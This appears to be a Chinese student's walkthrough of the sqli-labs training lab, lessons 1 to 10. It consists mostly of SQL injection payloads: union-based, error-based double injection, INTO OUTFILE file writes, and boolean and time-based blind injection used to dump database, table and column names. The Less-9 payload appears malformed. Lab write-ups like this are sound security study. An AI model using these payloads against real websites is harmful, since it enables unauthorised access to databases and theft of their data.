Less-1:single quotes
URL后加 ?id=1′ order by N%23 猜字段,N为3时显示正常,N为4时报错,得出字段数为3
然后联合查询:
?id=1' and 1=2 union select 1,2,3'#
得出注入点为2,3
把 union select 1,2,3 中的2,3逐次替换成user(),version(),database()查询数据,依次得到root@localhost, 10.1.19-MariaDB, security
payload:
?id=1' and 1=2 union select 1,user(),version()'#
爆数据表名称:
and 1=2 union select 1,group_concat(TABLE_NAME),3 from information_schema.tables where table_schema = database()%23
Table:emails,referers,uagents,users
使用payload(16进制为查出来的表名):
and 1=2 union select 1,group_concat(COLUMN_NAME),3 from information_schema.columns where TABLE_NAME =0x7265666572657273 %23
查询得出各数据表的列名
因为每个数据库都是一样的,所有下面的都不再放图片
Less-2:intiger
用?id=1 order by N爆出有3列字段
联合查询后得出注入点依然为2,3
查询得出Database(),user()分别为 security,root@localhost
payload:
?id=1 and 1=2 union select 1,database(),user()
查所有表名
?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()
查所有列
?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73
Less-3:single quotes with twist
测试闭合类型,测试得出为 ‘)
?id=1') order by N%23
爆出字段为3,再联合查询:
?id=1') and 1=2 union select 1,2,3%23
得出注入点为2,3
查询user(),database()
?id=1') and 1=2 union select 1,user(),database()%23
爆数据表
?id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23
修改相应表名可爆出所有列名
?id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23
Less-4:Double Quotes
测试后,可使用 ?id=1″ 来查看报错
然后闭合语句顺便查询字段
?id=1") order by N
得出字段为3
?id=1") and 1=2 union select 1,2,3%23
得出注入点为2,3
查询user(),database()
?id=1") and 1=2 union select 1,user(),database()%23
查数据表
?id=1") and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()%23
爆列名
?id=1") and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =0x656d61696c73 %23
Less-5:Double Injection-Single Quotes
用 ?id=1 试探和 ?id=1′ 试探,后者会报错,但加了%23又不报错
了解结构后,用 ?id=1′ order by N %23 爆出字段为3
在我以为又是老套路时,发现查注入点时不会有回显,所以我去百度了盲注,发现了类似的注入方法
http://www.freebuf.com/column/158705.html
然后我仿写了一段:
?id=1' union select 1,count(*),concat(user(),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23
代码中的user()可替换成database()进行查询:
然后查询表名:
?id=1' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema = 'security' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23
代码中的 limit 1,1 中的第一个数字可换成2和3,分别得到 uagents和 users
然后查询列名:
?id=1' union select 1,count(*),concat((select column_name from information_schema.columns where table_schema = 'security' and table_name = 'referers' limit 1,1),0x26,floor(rand(0)*2))x from information_schema.columns group by x%23
修改 limit 1,1 的前一个数字依次查询列名,修改 table_name 的值依次查询表中的列名
Less-6:Double Injection Double Quotes
测试了一下,原理与Less-5类似,只需把Less-5的注入语句中的单引号改为双引号即可成功注入
Less-7:Dump into outfile
试探过后不显示报错信息,查看了源文件
似乎有意隐藏了报错信息
毫无头绪,只能百度
https://blog.csdn.net/sherlock17/article/details/64454449
sqli-labs less-7
首先我在本机的 MySQL 的 my.ini 里添加了 secure_file_priv = “E:/text”(文件路径仅供参考,代码添加位置随意,感觉别在文件开头处就好)
然后开始注入(由以往注入知道有3字段,亦可通过 union select 1,2,3.. 不断添加数字来爆字段):
?id=1')) union select 1,user(),database() into outfile "E:/text/main.txt" --+
得到外部文件:
导出表名:
?id=1')) union select '*','*', table_name from information_schema.tables where table_schema='security' into outfile "E:/text/table.txt"--+
导出列名(emails):
?id=1')) union select '*','*',column_name from information_schema.columns where table_schema='security' and table_name='emails' into outfile "E:/text/emails.txt"--+
Less-8:Blind-Boolian Based-Single Quotes
经过几次注入测试后得发现:
当注入正确语句时会出现 You Are in… 当出现查询错误时没显示
用 ?id=1′ order by N–+ 得出字段为3
拆分每个数据,对每个字母进行判断再拼凑成完整数据,但每次都手动输入太麻烦且耗时,敲代码跑程序爆数据又不会…
payload:
?id=1' and if(substr((select database()),1,1)='s',0,1)--+
substr(A,a,1)为匹配
A需要自己构建语句,a为1开始依次递增的数字
select database()
select ‘‘,’‘,table_name from information_schema.tables where table_schema=’security’
select ‘‘,’‘,columns_names from information_schema.columns where table_schema=’security’ and table_name = ’emails’
Less-9:Blind-Time Based-Single Quotes
时间型布尔盲注(单引号)
不论注入语法是否正确,页面都不会变动。添加 sleep(10) ,使匹配信息正确时页面存在加载时间,从而进行判断
?id=1' and if(substr(A,a,1),1,1)=x,1,1),0,sleep(10))%23
结构上同,匹配对象x若为字符需要加单引号
Less-10: Blind-Time Based-Double Quotes
时间型布尔盲注(双引号)
把Less-9语句中的单引号换成双引号即可